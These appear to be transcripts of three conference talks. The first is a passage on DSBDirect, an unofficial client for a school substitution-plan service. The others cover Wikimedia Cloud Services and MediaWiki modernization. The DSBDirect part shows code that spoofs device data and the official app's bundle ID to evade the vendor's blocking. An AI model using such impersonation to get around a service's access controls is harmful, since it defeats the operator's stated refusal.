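    "message": "",            # free-text note shown to users ("fix expected by ...")
    "base_json": {},          # replacement request skeleton that credentials get appended to
    "extra_headers": {},      # additional HTTP headers to send to the server
    "send_real_date": False,  # switch for sending the real date instead of an empty string
}

def look_for_fix() -> dict:
    """Fetch remote overrides when the user taps 'look for a fix'."""
    try:
        with urllib.request.urlopen(NEWS_URL, timeout=10) as resp:
            overrides = json.load(resp)
    except (OSError, ValueError):
        overrides = {}
    return {**DEFAULTS, **overrides}
```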
I remember that at some point we even sent the words "Kartoffel" (potato) or "Toaster" as the device. Now I thought we were smart, and I added new functionality to this news system I explained earlier. Firstly, as a precaution, I could remotely activate sending the real date; "remotely" means that it happens when users click on "look for a fix". Secondly, I could now set an array of headers to send to the server. And thirdly, we had discovered some alternative endpoints. To understand this, you first have to know that they sell skinned versions of DSB. This is the normal DSBmobile, I showed it earlier already, and this is the IHACA-skinned DSBmobile. It's accessible via two URLs, it delivers the same data as this website, and it also has a corresponding skinned Android app. So I made the endpoint that the client sends its data to configurable, because each of these had a different endpoint, and that app used one of those two. However, this was tricky, because I had to prevent myself from giving myself the power to redirect users' queries to my own server. So I hardcoded four endpoint URLs into the app, the normal mobile one, the web one, the IHACA mobile one and the IHACA BB one, so I could switch between them using an integer, and I set it to the IHACA mobile endpoint. I believe it was the very next day that the IHACA mobile and IHACA BB endpoints were broken; actually, they returned invalid data in a way that crashed my app. Whoops. And suddenly the web endpoint from the normal website was constantly moving to new locations, and there was a configuration.js script that said where it was. So, as a precaution in case I needed it later, I hardcoded into the app a very specific way to find this location: it was behind the seventh quotation mark or something. Clearly unreliable. And suddenly the string was moved a line downwards, so it was now behind the ninth quotation mark. Interesting. Also, that app stopped working; it's still on the Play Store now, and it's still not working, and the website is still available and not working, because they broke their own endpoint. This was around the time that this Google Play takedown notice reached us, because apparently DSBDirect infringes the trademark of DSB. I don't feel qualified to comment on this, as I don't understand trademark law. I tried three times to ask for a specific clarification as to why they removed my app, but they never responded. By the way, that's a nice trick you can do with emails you don't like: you can just pretend you never received them. A few days later, the website's JavaScript, including configuration.js, was obfuscated in such a way that I don't understand how it works, but it constantly invokes the debugger if the developer tools are open. In theory you can easily circumvent this by telling the browser to ignore breakpoints; this doesn't seem to work in Firefox, but it works in Chromium, I don't know why. I'm just going to assume we could have figured this out somehow, be it by running a web view in the background if we absolutely had to. But fortunately, contributor Pixelon had already worked out what is needed to talk to the mobile endpoint now, because through more decompilation he learned that the app ID was being generated using the default Java UUID class, UUID.randomUUID().toString(). Also, the device field was mandatory. So I added spoofed data: I took a random device from a list, I took a random OS version from anywhere between 4.0.2 and 10.0, I took a random language, mostly German, sometimes English, and, as you'll see in a moment, a spoofed bundle ID as well.
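A sketch of that spoofed client metadata, using Python's uuid module as the counterpart of Java's UUID.randomUUID().toString(). The device names, version list and package ID below are placeholders, not the values DSBDirect actually used.

```python
import random
import uuid

DEVICES = ["SM-G960F", "Pixel 3", "ONEPLUS A6003"]   # illustrative model names only
OS_VERSIONS = ["4.0.2", "5.1", "7.0", "8.1", "9.0", "10.0"]
LANGUAGES = ["de"] * 9 + ["en"]                      # mostly German, sometimes English

def spoofed_client_info() -> dict:
    """Generate plausible-looking per-installation metadata for each request."""
    return {
        "AppId": str(uuid.uuid4()),          # same idea as UUID.randomUUID().toString()
        "Device": random.choice(DEVICES),
        "OsVersion": random.choice(OS_VERSIONS),
        "Language": random.choice(LANGUAGES),
        "BundleId": "de.example.dsbmobile",  # placeholder package ID, not the real one
    }
```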
And as the bundle ID, I took the package ID of DSBmobile, with an option to disable this via the news file in case it would get in the way somehow. And that was the end of that. Apparently, they stopped trying to prevent DSBDirect from working; apparently F-Droid releases don't count for them, and it isn't worth their time. Or maybe they're just uncreative. I could still think of a few ways to tell DSBDirect and DSBmobile apart, but I'm obviously not going to tell them. However, just this month, Pixelon asked again why DSBDirect was removed from the Play Store. Also, because he believed we didn't violate German trademark law, contributor Jasmich, who is sitting here, by the way, had uploaded DSBDirect to the Play Store again. And he received a rather interesting response. "Dear Mr. Herzberger, dear Pixelon. Thank you for your email. Unfortunately, it has not been possible to have a qualified discussion about this topic with you, and we know neither your details nor those of Mr. Godau." This means, unfortunately, we don't have your address, so we can't send you legally meaningful messages, and they seem to imply that this is intentional. "It is also not clear in what legal relationship you stand to each other." This is a bit strange, because I don't know either. According to my father, we might be a Gesellschaft bürgerlichen Rechts, a civil-law partnership, but that's not exactly proof of familiarity with free software. "Nevertheless, I would like to state our position once again as follows: yet again, a third party has used our internal DSBmobile API, which is meant for our own software products. We are telling you this briefly and for the last time: you may not use our internal API." I find it questionable whether a publicly reachable API is to be considered internal. One might argue that it is only meant for communication between software they control, but I believe I control my device and my client installation, not them, which makes the API not internal. "An app with the same or a similar name as DSB also enjoys trademark protection in the European area through heinekingmedia." I don't understand trademark law. There are so many trademarks starting with, or just consisting of, the letters DSB, with partially overlapping registered use cases, and their trademark doesn't seem to have distinctive character ("Unterscheidungskraft"), and I just don't understand it. By the way, there is another trademark, "Digitales Schwarzes Brett", registered by someone other than heinekingmedia, and it was once rejected as a national trademark precisely because it didn't have distinctive character. Why can there be European trademarks without distinctive character? I do not understand, and I'm not qualified to comment. "Providing an app in a store is a business activity, no matter what economic purpose it serves. There is a danger of confusion. We hereby prohibit you, for the last time, from using the protected trademark DSB." The first part is true, I had gotten that wrong: it counts as commercial activity ("geschäftlicher Verkehr") when you provide a service to the public, even for free. There is a danger of confusion: this has to be about the letters DSB, right? Because, as I explained earlier, our logo is completely unrelated. However, I'm not too certain that there really is a danger of confusion that heinekingmedia is directly affected by, or exclusively affected by. After all, one could also believe that it is an app that provides access to something related to the Danish railway company.
Of course it is not, but it's about recognition value, which is not something that DSB has exclusively, for sure. "We hereby prohibit you for the last time from using the protected trademark DSB." Oh yeah, I already read that out. "Should you continue to violate our clear demand, we will hand the case over to our legal representation, Dr. Selig, who is already in CC on this email." Scaring us. "We will likewise continue to take action against every publication of such an app. Any costs arising from this we would claim from you as damages. We ask for your strict compliance. Kind regards, Andreas Norg." Norg? That's the CEO of heinekingmedia. Yay, we're famous. We forwarded this email to contributor Jasmich, who had DSBDirect up on the Play Store at this point in time, and he decided to take it down and apologize. Suddenly, and this was the very next day, he received an email that sounded a lot friendlier. "Hello. Thank you very much for being so accommodating. We think your approach is, in principle, very good. However, we would have wished that you had asked us for permission before publishing and using our API." If we had asked for permission, I'm quite sure we would not have received it. "Nevertheless, we would like to recognise your commitment and would therefore like to invite you to visit us in Hanover. Perhaps you can help us build a better app with your ideas. Perhaps we will even find a way for you to help build it. We are happy to support young talent. We would be delighted to get to know you. I look forward to your reply. Kind regards, Norg." I'd rather leave this largely uncommented. I don't know exactly what they want from us, but I guess we'll have to see. And that's the dramatic cliffhanger we have to end this talk with, for the events are yet to unfold. There are a few things I can learn from this. Don't use other people's trademarks, because trademark law is too complicated. Apologizing instead of being rebellious seems to work better; even if the thought of conflict intrigues you and you really do believe you're in the right, you've probably just misunderstood the law. Alternatively, or in addition, do such things anonymously. Decide beforehand what you want to put your name on. Thank you.
Many schools in Germany choose to distribute their substitution plans via the proprietary [DSB platform](https://heinekingmedia.de/education/digitales-schwarzes-brett). The provided client software is not very pleasant to use and inconveniences users with its dependency on Google Play Services. That's why I developed a free client for Android called DSBDirect, which is able to display plans in a nice, filtered way. Since they noticed my app, the company operating DSB has been obfuscating their various endpoints more and more in an attempt to prevent my app from working, while on the other hand not being very competent at security. It's a cat-and-mouse game.
10.5446/53234 (DOI)
Hello, hello everybody, we're ready to get started. We have Lucas and Amir here, and they want to give us a quick introduction to a project from the Wikimedia Foundation called Cloud Services and how it might be useful to all of us. So let's give a round of welcoming applause to Lucas and Amir. Thanks. Hello. So, Wikimedia Cloud Services is basically this big collection of all kinds of different things which are useful if you want to do technical things in the Wikimedia universe, like with Wikipedia or other projects, and you get them free of charge; the only requirement is that you use them for something that's relevant to the mission of Wikimedia of promoting free knowledge and that kind of stuff. It's kind of split into the things that you can do with your regular Wikimedia account, which any registered user can do, and the things you need a special account for, on a different system called Wikitech; Amir is going to talk more about those later. But first let's just look into some of the things you can do with your regular Wikimedia account, and if you want to follow any of these links, there's a shortcut here. I was about to switch to the next slide too soon, so let's just stay here for a few seconds. The first thing is the API sandbox. If you want to use the MediaWiki API to figure out what you have on a page, or to make edits, or any kind of stuff like that, the API sandbox is a special page that's really useful for finding out how to use the API. For example, here are all the different actions I can use. Let's say query, which is the kind of general catch-all action, and then I get down here a list of all the parameters I can use with query: such as, I want to have the user info, and what kind of user info do I want, options and so on, and I would like a different format version. So it gives you all these nice inputs for figuring out exactly how to use the API, what's valid and what's not valid, and then you can make the API request and you get a response, which we can't read here because it's zoomed in way too much, but it's very helpful when trying to use the API. And in the end, down here, you can see what you need to do in your own code to make the same API request. If you want to do some kind of more expensive analysis than you can do with the normal API, you can often do that with Quarry, which is a tool that lets you write SQL queries against databases that are almost like the ones in production; you don't have user passwords and stuff, but you have all the database tables with the page metadata, the connections between them, the logs and all kinds of stuff. You can just write your SQL here, send it, and you get the results. For example, here is the number of lexemes published per day: it's selecting from the page table where the namespace is the Lexeme namespace, grouping by date, and then we get something like, all the way down to September, which is apparently when I ran this query, 116 lexemes created on this day. Or here, someone had a list of edits to JavaScript and CSS pages on the Hungarian Wikipedia. So you can run these queries against any wiki you like, like this Hungarian Wikipedia one. And if you can't get by with just SQL, what you also have is this thing called PAWS, which gives you a Jupyter notebook instance, if you've heard of that. You can basically write your own Python code here and do it in a very convenient way, because there's all kinds of auto-completion and helpful things.
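For reference, the request that the API sandbox builds interactively can be replayed from any script against the public MediaWiki action API. The wiki and the userinfo fields below are just an example; without logging in, the API simply reports the anonymous user.

```python
import requests

resp = requests.get(
    "https://en.wikipedia.org/w/api.php",
    params={
        "action": "query",          # the general catch-all action mentioned in the talk
        "meta": "userinfo",
        "uiprop": "options",
        "format": "json",
        "formatversion": "2",       # the "different format version" shown in the sandbox
    },
    headers={"User-Agent": "cloud-services-demo/0.1 (example contact)"},
    timeout=10,
)
resp.raise_for_status()
print(resp.json()["query"]["userinfo"])
```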
So I can just try to copy this and run the code. Damn, I needed a new cell below it. There we go, thanks. And if I type "item", I should get helpful hints about what I can do with the item, if it's not hanging or something; Tab, or Ctrl-Space, oh, there we go. Yeah, and that's also a very useful way to work with Pywikibot. Or you can also directly get a normal shell here. And one thing, oops, did I click the wrong thing? I would like to have, oh no, I don't want a bash notebook, I want a new terminal, that's what I want. And here you have, for example, the database dumps, in, where was it, /public/dumps, something with "public" again. So if you want to do some kind of analysis on the data dumps, you can get them here and then have all the computing time you want, I guess, to analyze the wiki more thoroughly. And all this is hosted in the Wikimedia cloud for you, so you don't need your own server or anything. Oh yeah, I had two more examples of that. For example, here I used it because there were a lot of items on Wikidata with some encoding error: this should be an apostrophe, like down here, and instead it was this kind of "i" with an accent, and I hacked together some ugly Python code in the notebook to make all of these edits. And it was already logged in as well; I didn't need to worry about logging in or having a password or anything. So it's a very convenient way to make edits as well. Or you can build something nicer here: you can insert markdown cells to explain what you're doing and how the code works, and build nice notebooks like that, which are almost self-explanatory. And those are some of the things you can do just with your Wikimedia account, and now Amir is going to talk about some other things. Thanks, Lucas. So, the thing is, maybe some of you, like me, think that doing things in the browser is for kids, and I need to do things in a terminal and connect to the system. For that you can get a Wikitech account, which you can just create in this place called Wikitech. No, no, the main thing, the main list, oh yeah, okay, so in here. You make a Wikitech account, it gets approved quickly, and then you get the shell. Then you can just quickly go there, log in to this shell, and you have access to a big set of nodes in the cloud and you can just do whatever you want. You also have access to the dumps, and you have access to the replica databases. Let me show it to you. This one? Alt-Tab, yeah, okay. So for example you can run ls, ah, German keyboard layout, on the dumps: you go to /public/dumps/public/wikidatawiki, and there are dumps from all sorts of times, everything you want. But you can also do something else: you can just run "sql wikidatawiki", okay, and then you're inside the Wikidata database. I mean, you don't have write rights, you cannot write to the replica, because it's a replica, and it's also sanitized, so it doesn't have things like the hashes of user passwords. But you can still run plain SELECT queries.
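In PAWS, the Pywikibot framework is preinstalled and already authenticated as your account, so a small fix-up script can look roughly like this. The mojibake pattern and the French description below are made-up examples, not the actual cleanup Lucas ran.

```python
import pywikibot

# PAWS is already logged in, so no password handling is needed here.
site = pywikibot.Site("wikidata", "wikidata")
repo = site.data_repository()

item = pywikibot.ItemPage(repo, "Q42")  # Douglas Adams, a classic test item
item.get()                              # fetch labels, descriptions, claims, ...
print(item.labels.get("en"))

# A hypothetical encoding fix, similar in spirit to the apostrophe cleanup:
desc = item.descriptions.get("fr", "")
if "Ã©" in desc:  # made-up mojibake marker for illustration
    item.editDescriptions({"fr": desc.replace("Ã©", "é")},
                          summary="fix broken encoding in description")
```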
For example, select from recentchanges, limit 5; it's probably not sorted by anything convenient, but then you get all the things you want. You can query anything you want directly in the system. Then there is also something called the job grid: you can set up a cron job, or just run something directly, and it goes through a big set of nodes in the cloud, or through Kubernetes, and runs whatever you want. There's more information about it in here; there's a long help page that says run this job, and what it does, and so on. It's a bash command; you can run any bash command and say: okay, return the output to this place and the errors to that other place. Another thing you can do is use the web server, so you can just put a PHP file there. For example, this is something we built together, I think two Christmases ago: this is a PHP file, the source code is available, and you just copy that source code into a directory, and it's there, and every time you click on it you get the recent edits to descriptions on Wikidata that might be vandalism, so we can fix them. And that's not the only thing you can do with this: you can also put up a Python Flask application, it can just be a Python application and you just have the file there, and also Node.js and Java, there are so many options. You can also have your own database. For example, QuickCategories here stores its jobs, which are here, in its own database inside our cloud services, and that's just fine, you can do that as well. And there's also Cloud VPS, which doesn't do any Kubernetes: you can make a VPS of your own and then do whatever you want with it. You get a project and you get a quota, so it's slightly more limited, but you have access to the whole VPS, you have sudo rights on it, you can do whatever you feel like with it. So we have, for example, this project in here, it's called "tools", and then there are proxies, and you can, for example, go into an instance and reboot it and do whatever you want, and you can make new instances, look at your quota and look at everything else there. You can even run a wiki on one of those Cloud VPS systems, which is what we did here, for example; if you look at it, it's just a wiki. The difference is that for the other ones, for example the vandalism dashboard, you have tools.wmflabs.org and then a slash and the tool name, wdvd, which is the tool itself, but here we get our own subdomain directly under wmflabs.org, and you can register all sorts of subdomains under wmflabs.org as long as they're not taken. So you can build a MediaWiki instance like this, or run a completely new piece of software, anything; you could put a WordPress there, who cares, and then use it. It's very simple, you have your own thing, and it can help lots of Wikipedians. Anything else? I don't think so. Most important, I would say, is Toolforge to run your website, or if that's not enough for you, Cloud VPS, where you get your own VM and you can do absolutely anything you want, as long as it matches those rules and stuff. And I think that's it. Are there any questions?
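This is not the exact tool shown in the talk, just a hedged sketch of what a small Toolforge web service querying the wiki replicas could look like. The replica hostname pattern and the replica.my.cnf credentials file follow the Toolforge documentation as I understand it; check the current docs before relying on them.

```python
from flask import Flask, jsonify
import pymysql

app = Flask(__name__)

def replica_connection(dbname: str = "wikidatawiki") -> pymysql.connections.Connection:
    # On Toolforge, credentials live in ~/replica.my.cnf and the replicas are
    # reachable under <db>.analytics.db.svc.wikimedia.cloud (subject to change).
    return pymysql.connect(
        host=f"{dbname}.analytics.db.svc.wikimedia.cloud",
        database=f"{dbname}_p",
        read_default_file="~/replica.my.cnf",
    )

def to_str(value) -> str:
    # Replica columns often come back as bytes; decode them for JSON output.
    return value.decode("utf-8", errors="replace") if isinstance(value, bytes) else str(value)

@app.route("/recent")
def recent():
    conn = replica_connection()
    try:
        with conn.cursor() as cur:
            cur.execute(
                "SELECT rc_title, rc_timestamp FROM recentchanges "
                "ORDER BY rc_timestamp DESC LIMIT 5"
            )
            rows = [{"title": to_str(t), "timestamp": to_str(ts)} for t, ts in cur.fetchall()]
    finally:
        conn.close()
    return jsonify({"recent": rows})
```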
Hello, thank you very much for the talk, that was very quick. So, does anybody have a question here? I'll give you my microphone to ask it. I don't see any hands. No? Okay, I don't think we have questions, but if you're just too shy to ask, these guys are always hanging around here at the WikipakaWG assembly, so if you have anything you want to talk about, you'll find them later. Okay, then give a round of applause again for Lucas and Amir.
Find out what kind of free services Wikimedia provides for you. Wikimedia Cloud Services is a collection of services that the Wikimedia Foundation offers, free of charge, to anyone who can use them for furthering the goals of the Wikimedia movement. This includes Toolforge, a hosting service for tools written in various languages; Cloud VPS, full virtual private servers for advanced development beyond the capabilities of Toolforge; convenient access to Wikimedia project data; and more!
10.5446/53239 (DOI)
Good morning. I'm glad you all made it here this early on the last day. I know it can be easy. It wasn't easy for me. I have to warn you that the way I prepared for this talk is a bit experimental. I didn't make a slide set. I just made a mind map and I'll just click through it while I talk to you. So this talk is about modernizing Wikipedia. As you probably have noticed, visiting Wikipedia can feel a bit like visiting a website from 10, 15 years ago. But before I talk about any problems or things to improve, I first want to revisit that the software and the infrastructure we build around it has been running Wikipedia and its sister sites for the last, well, nearly 19 years now. And it's extremely successful. We serve 17 billion page views a month. Yes? You make it louder? Is this better? If I speak up, I will lose my voice in 10 minutes. It's already a bit, no, it's fine. We have technology for this. The light doesn't help. The contrast could be better. Is it better like this? Okay, cool. All right. So, yeah, we are serving 17 billion page views a month, which is quite a lot. Wikipedia exists in about 100 languages. If you attended the talk about the Wikipedia infrastructure yesterday, we talked about 300 languages. We actually supported 300 languages for localization. But we have Wikipedia in about 100 if I'm not completely off. I find this picture quite fascinating. This is a visualization of all the places in the world that are described on Wikipedia and sister projects. And I find this quite impressive. Though it also is a nice display of cultural bias, of course. We, that is, the Wikimedia Foundation run about 900 to 1,000 wikis, depending on how you count. But there are many, many more media wiki installations out there. Some of them big, some of them, and many, many of them small. We have, actually, we have no idea how many small instances there are. So it's a very powerful, very flexible, versatile piece of software. But, you know, sometimes it can feel like you can do a lot of things with it, right? But sometimes it feels like it's a bit overburdened. And maybe you should look at improving the foundations. So one of the things about that make media wiki great, but also sometimes hard to use is that kind of everything is text. Everything is markup. Everything is done with Wikichext, which has grown in complexity over the years. So if you look at the autonomy of a wiki page, it can be a bit daunting. You have different syntax for markup, different kinds of transclusion or templates in media, and some things actually, you know, get displayed in place, some things show up in a completely different place on the page. It can be rather confusing and daunting for newcomers. And also things like having a conversation, just talking to people, like, you know, having a conversation thread looks like this. You open the page, you look through the markup, and you indent to make a conversation thread. And then you get confused about the indenting, and someone messes with the formatting, and it's all excellent. There have been many attempts over the years to improve the situation. We have things like Echo, which notifies you, for instance, when someone mentions your name, or someone... It is also used to welcome people and do this kind of achievement unlock notifications. Hey, you did your first edit. This is great. Welcome, right? To make people a bit more engaged with the system. But it's really mostly improvements around the fringes. 
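One concrete consequence of the "everything is markup" situation described above is that any tool that wants structured information out of a page has to parse wikitext first. A small sketch using the mwparserfromhell Python library; the template and parameter names below are just an example, and real templates vary wildly between wikis.

```python
import mwparserfromhell

wikitext = """
{{Infobox settlement
 | name             = Leipzig
 | population_total = 587,857
}}
Some article text with a [[link]] and a {{citation needed}} tag.
"""

code = mwparserfromhell.parse(wikitext)
for template in code.filter_templates():
    # matches() normalizes case and whitespace in the template name.
    if template.name.matches("Infobox settlement") and template.has("population_total"):
        value = template.get("population_total").value.strip_code().strip()
        print("population:", value)  # still just a string, not typed data
```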
We have had a system called Flow for a while to improve the way conversations work. So you have more like a thread structure that the software actually knows about. But then there are many... Well, quite a few people who have been around for a while are very used to the manual system. And also there are a lot of tools to support this manual system, which of course are incompatible with making things more modern. So we use this, for instance, on mediawiki.org, which is a site, basically a self-documentation site of MediaWiki. But on most Wikipedia's, this is not enabled, or at least not used per default everywhere. The biggest attempt to move away from the text-only approach is Wikidata, which we started in 2012. The idea of Wikidata, of course, if you didn't attend many great talks, we had about it here over the course of the Congress, is a way to model the world using structured data, using a semantic approach instead of a natural language, which has its own complexities, but at least it's a way to represent the knowledge of the world in a way that machines can understand. So this would be an alternative to Wikitext, but still the vast majority of things, especially on Wikipedia, are just markup. And this markup is pretty powerful, and there's lots of ways to extend it and to do things with it. So a lot of things on MediaWiki are just DIY, just do it yourself. Templates are a great example of this. Infoboxes, of course, the nice blue boxes you have on the right side of pages are done using templates, but these templates are just for formatting, right? They're not data processing. There's no database or structured data backing them. It's just basically, you know, it's still just markup. You have a predefined layout, but you're still feeding a text, not data. You have parameters, but the values of the parameters are still, again, maybe templates or links, or you have markup in them like HTML line breaks and stuff. So it's kind of semi-structured. And this, of course, is also used to do things like workflows. So the template I just showed, no, this was actually an Infobox, wrong picture, wrong caption. It's also used to do workflows. So if a page on Wikipedia gets nominated for deletion, you put a template on the page that defines why this is supposed to be deleted, and then you have to go to a different page and put a different template there, giving more explanation, and this, again, is used for discussion. It is a lot of, you know, structure created by the community and maintained by the community using conventions and tools built on top of essentially what is essentially just a pile of markup. And because doing all this manually is kind of painful, early on, we created a system to allow people to add JavaScript to the site, which is then maintained on Wikipedia by the community. And it can tweak and automate. But again, this, it doesn't really have much to work with, right? It basically messes with whatever it can. It directly interacts with the DOM of the page. Whenever the layout of the software changes, things break. So this is not great for compatibility, but it's used a lot. And it is very important for the community to have this power. Sorry. I wish there was a better way to show these pictures. Okay. Yeah, that's just to give you an idea of what kind of thing is implemented that way and maintained by the community on their site. One of the problems we have with that is these are bound to a wiki, and I just told you that we run over 9,000, no, 900 of these, not over 9,000. 
And it would be great if you could share them between wikis, but we can't. And again, there have been, we have been talking about it a lot, and it seems like it shouldn't be so hard, but you kind of need to write these tools differently if you want to share them across sites because different sites use different conventions, they use different templates, then it just doesn't work. And you actually have to write these in software that uses internationalization if you want to use it across wikis. While these are usually just one off hacks with everything hard coded, we would have to put in place an internationalization system, and it's actually a lot of effort, and there's a lot of things that are actually unclear about it. So before I dive more deeply into the different things that, well, make it hard to improve on the current situation and the things that we are doing to improve it, do we have any questions or do you have any other, do you have any things you may find particularly, well, annoying or particularly outdated when interacting with Wikipedia? Any thoughts on that beyond what I just said? The strict separation just in Wikipedia between mobile layout and desktop layout. So actually having a reactive layout system that would just work for mobile and desktop in the same way, and allowing the designers and UX experts who work on the system to just do this once, and not two or maybe even three times, because we also have native applications for different platforms, would be great, and it's something that we are looking into at the moment. But it's not that easy. We could build a completely new system that does this, but then again you would be telling people you can no longer use the old system, but no, they have built all these tools that rely on how the old system works, and you have to port all of this over, so there's a lot of inertia. Any other thoughts? Everyone is still asleep. That's excellent, so I can continue. So another thing that makes it difficult to change how many Wiki works or to improve it, is that we are trying to do at least two things at once. On the one hand, we are running a top five website and serving over 100,000 requests per second using the system, and on the other hand, at least until now, we have always made sure that you can just download MediaWiki and install it on a shared hosting platform. You don't even need root on the system, right? You don't even need administrative privileges. You can just set it up and run it in your web space, and it will work. And having the same piece of software do both, run in a minimal environment, and run at scale is rather difficult, and it also means that there's a lot of things that we can't easily do. All this modern microservice architecture, separate front-end and back-end systems, all of that means that it's a lot more complicated to set up and needs more knowledge or more infrastructure to set up. And so far, that meant we can't do it because so far there was this requirement that you should really be able to just run it on your shared hosting. And we are currently considering to what extent we can continue this. And container-based hosting is picking up. Maybe this is an alternative. It's still unclear, but it seems like this is something that we need to reconsider. Yeah, but if we make this harder to do, then a lot of current uses of MediaWiki would maybe no longer exist, or at least would not exist as they do now, right? 
You probably have seen this nice MediaWiki instance, the Congress Wiki, which are completely with a completely customized skin, and a lot of extensions installed to allow people to define their sessions there, and making sure these sessions automatically get listed and get put into a calendar. And this is all done using extensions like Semantic MediaWiki that allow you to basically define queries in the WikiText markup. Another thing that of course slows down development is that Wikimedia does engineering on a comparatively a shoestring budget, right? The budget of the Wikimedia Foundation, the annual budget, is something like $100 million. That sounds like a lot of money. But compared to other companies running a top five or top ten website, it's like 2% of their budget or something like that, right? It's really, I mean, $100 million is not peanuts, but compared to what other companies invest to achieve this kind of goal it kind of is. So what this budget translates into is something like 300, depending on how you count, between 300 and 400 staff. So this is the people who run all of this, including all the community outreach, all the social aspects, all the administrative aspects. Less than half of these are the engineers who do all this. We have something like 1,500 servers, bare metal, which is not a lot for this kind of thing. Which also means that we have to design the software to be not just scalable, but also quite efficient. The modern approach to scaling is usually scale horizontally, make it so you can just spin up another virtual machine in some cloud service. But yeah, we run our own servers, so we can design to scale horizontally, but it means ordering hardware and setting it up, and it's going to take half a year or so. And we don't actually have that many people who do this. So scalability and performance are also important factors when designing the software. Okay, before I dive into what we are actually doing, any questions? This one in the back. Wait for the mic, please. Hi. So you said you don't have that many people, but how many do you actually have? It's something like 150 engineers worldwide. It always depends on what you count. Do you count the people who work on the native apps? Do you count engineers who work on the Wikimedia cloud services? Actually, we do have cloud service. We offer them to the community to run their own things, but we don't run our stuff on other people's cloud. So depending on how you count or something, and whether you count the people working here in Germany for Wikimedia Germany, which is a separate organization technically, something like 150 engineers. Thanks. I'm interested. What are the reasons that you don't run on other people's services like on the cloud? It will be easy to scale for something, right? Well, one reason is being independent. Imagine we ran all our stuff on Amazon's infrastructure, and then maybe Amazon doesn't like the way that the Wikimedia article about Amazon is written. What do we do? Maybe they shut us down. Maybe they make things very expensive. Maybe they make things very painful for us. Maybe there is a, at least like a self-censorship mechanism happening. And we want to avoid that. There are thoughts about this. There are thoughts like maybe we can do this at least for development infrastructure and CI, not for production. Maybe we can make it so that we run stuff in the cloud services by more than one vendor. So we basically, we spread out so we are not reliant on a single company. 
We are thinking about these things, but so far the way to actually stay independent has been to run our own service. You've been talking about scalability and changing the architecture. That kind of seems to imply to me that there is a problem with scaling at the moment, or that it's foreseeable that things are not going to work out if you just keep doing what you're doing at the moment. Can you maybe elaborate on that? I think there are two sides to this. On the one hand, the reason I mentioned it is just that a lot of things that are really easy to do, basically for me, right, works on my machine, are really hard to do if you want to do them at scale. One aspect, the other aspect is media Wiki is pretty much a PHP monolith. That means scaling always means copying the monolith and breaking it down so you have smaller units that you can scale and just say, yeah, I don't know, I need more instances for authentication handling or something like that. That would be more efficient, right, because you have higher granularity. You can just scale the things that you actually need, but that of course needs re-architecting. It's not like things are going to explode if we don't do that very soon. So there's not like an urgent problem there. The reason for us to re-architect is more to gain more flexibility and development, because if you have a monolith that is pretty entangled, code changes are risky and take a long time. How many people work on product design or user experience research to sit down with users and try to understand what their needs are and from their procedure? I don't have an exact number. Something like five. Do you think that's sufficient? The question was if it's sufficient. Probably not, but it's more people than we have for database administration and that's also not sufficient. Are there further questions? Okay. One of the things that holds us back a bit is that there's literally thousands of extensions for MediaWiki and the extension mechanism is heavily reliant on hooks, so basically on callbacks. I don't have a picture. I have a link here. We have a great number of these. So you see each paragraph is basically documenting one callback that you can use to modify the behavior of the software. I never counted, but something like a thousand. All of them are of course interfaces to software that is maintained externally, so they have to be kept stable. If you have a large chunk of software that you want to restructure, but you have a thousand fixed points that you can change, things become rather difficult. These hook points kind of like nails in the architecture, and then you kind of have to wiggle around them. It's fun. We are working to change that. We want to architect it, so the interface that is exposed to these hooks become much more narrow, and the things that these hooks or these callbacks functions can do is much more restricted. There is currently an RSC open for this. It has been open for a while, actually. The problem is that in order to assess whether the proposal is actually viable, you have to survey all the current uses of these hooks and make sure that the use case is still covered in the new system. We have a thousand hook points and a thousand extensions. That's quite a bit of work. Another thing that I'm currently working on is establishing a stable interface policy. This may sound pretty obvious. It has a lot of pretty obvious things. If you have a class and there's a public method, then that's a stable interface. It will not just change without notice. 
We have a deprecation policy and all that. If you have worked with extensible systems that rely on the mechanisms of object-oriented programming, you may have come across the question whether a protected method is part of the stable interface of the software or not, or maybe the constructor. If you have worked in environments that use dependency injection, the idea is basically that the constructor signature should be able to change at any time, but then you have extensions that you subclassing and things break. This is why we are trying to establish a much more restrictive stable interface policy that would make explicit things like constructor signatures actually not being stable. That gives us a lot more wiggle room to restructure the software. MediaWiki itself has grown as a software for the last 18 years or so, and at least in the beginning was mostly created by volunteers. You can use the dependency to find and grab the thing that you want to use and just use it, which leads to structures like this one. Everything depends on everything. If you change one bit of code, everything else may or may not break. If you don't have great test coverage at the same time, this just makes it so that any change becomes very risky and you have to do a lot of manual testing and a lot of manual digging around, touching a lot of files. For the last year, year and a half, we have started a concerted effort to cut the worst ties to decouple these things that have most impact. There are a few objects in the software that represent, for instance, one that represents a user and one that represents a title that are used everywhere and the way they're implemented currently also means that they depend on everything, and that, of course, is not a good situation. A similar idea on a higher level is decomposition of the software. The decoupling was about software architecture. This is about system architecture. Breaking up the monolith itself into multiple services that serve different purposes. The specifics of this diagram are not really that relevant to this talk. It's more to give you an impression of the complexity and the sort of work we are doing there. The idea is that perhaps we could split out certain functionality into its own service into a separate application, like maybe move all the search functionality into something separate and self-contained. The question is, how do you, again, compose this into the final user interface? At some point, these things have to get composed together again. Again, this is a very trivial issue if you only want this to work on your machine or you only need to serve 100 users or something. But doing this at scale, doing it at the rate of something like 10,000 page views a second, I said 100,000 requests earlier, but that includes resources, ICANN, CSS, and all that. Then you have to think pretty hard about what you can cache and how you can recombine things without having to recompute everything. This is something that we are currently looking into, coming up with an architecture that allows us to compose and recombine the output of different backup services. Before I started this talk, I said I would probably roughly use half of my time going through the presentation. I guess I just hit that spot on. This is all I have prepared, but I'm happy to talk to you more about the things I said or maybe any other aspects of this that you may be interested in. If any comments or questions? Oh, three already. First of all, thanks a lot for the presentation. 
